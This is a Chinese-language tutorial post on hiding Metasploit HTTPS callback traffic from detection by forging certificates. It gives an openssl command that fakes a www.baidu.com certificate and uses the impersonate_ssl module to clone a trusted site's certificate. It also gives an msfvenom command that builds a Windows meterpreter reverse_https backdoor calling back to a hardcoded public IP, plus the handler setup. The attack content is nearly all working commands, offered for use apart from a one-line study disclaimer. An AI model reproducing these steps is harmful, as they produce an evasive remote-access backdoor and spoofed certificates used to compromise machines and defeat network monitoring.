MSF-流量通讯特征修改-证书-OpenSSL&impersonate_ssl

免责声明:本文仅做技术交流与学习...

目录

步骤:

[1-利用 openssl 生成证书](#1-利用 openssl 生成证书)

[1-impersonate_ssl 模块 --生成证书](#1-impersonate_ssl 模块 --生成证书)

​编辑

[2.MSF 生成绑定证书后门:](#2.MSF 生成绑定证书后门:)

[3.MSF 监听上线:](#3.MSF 监听上线:)

证书伪造

https流量加密


-解决 HTTPS-SSL 通讯证书被特征标示问题

步骤:

1-利用 openssl 生成证书

复制代码
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj "/C=UK/ST=xiaodi/L=xiaodi/O=Development/CN=www.baidu.com" -keyout www.baidu.com.key -out www.baidu.com.crt && cat www.baidu.com.key www.baidu.com.crt > www.baidu.com.pem && rm -f www.baidu.com.key www.baidu.com.crt

1-impersonate_ssl 模块 --生成证书

复制代码
此外 Metasploit 框架还有一个 auxiliary/gather/impersonate_ssl 模块,可以用来自动从信任源创建一个虚假证书,十分方便: 
use auxiliary/gather/impersonate_ssl 
set RHOST www.baidu.com 
run 
--->.pem


2.MSF 生成绑定证书后门:

复制代码
msfvenom -p windows/meterpreter/reverse_https LHOST=47.94.236.117 LPORT=5566 PayloadUUIDTracking=true PayloadUUIDName=Whoamishell 
HandlerSSLCert=/root/www.baidu.com.pem StagerVerifySSLCert=true -f exe -o https-b.exe 

3.MSF 监听上线:

复制代码
use exploit/multi/handler 
set payload windows/meterpreter/reverse_https 
set lhost 0.0.0.0 
set lport 5566 
set HandlerSSLCert /root/www.baidu.com.pem 
set StagerVerifySSLCert true 
run 

---可以访问https看看证书

证书伪造


https流量加密


相关推荐
ajassi200014 小时前
linux C 语言开发 (八) 进程基础
linux·运维·服务器
yzx99101315 小时前
接口协议全解析:从HTTP到gRPC,如何选择适合你的通信方案?
网络·人工智能·网络协议·flask·pygame
你的人类朋友15 小时前
🔒什么是HMAC
后端·安全·程序员
程思扬15 小时前
利用JSONCrack与cpolar提升数据可视化及跨团队协作效率
网络·人工智能·经验分享·docker·信息可视化·容器·架构
阿部多瑞 ABU16 小时前
《基于国产Linux的机房终端安全重构方案》
linux·安全
init_236116 小时前
isis dis选举
网络
倔强的石头10617 小时前
【Linux指南】Makefile入门:从概念到基础语法
linux·运维·服务器
风_峰17 小时前
【ZYNQ开发篇】Petalinux和电脑端的静态ip地址配置
网络·嵌入式硬件·tcp/ip·ubuntu·fpga开发
ajassi200017 小时前
linux C 语言开发 (七) 文件 IO 和标准 IO
linux·运维·服务器
一只游鱼17 小时前
Zookeeper介绍与部署(Linux)
linux·运维·服务器·zookeeper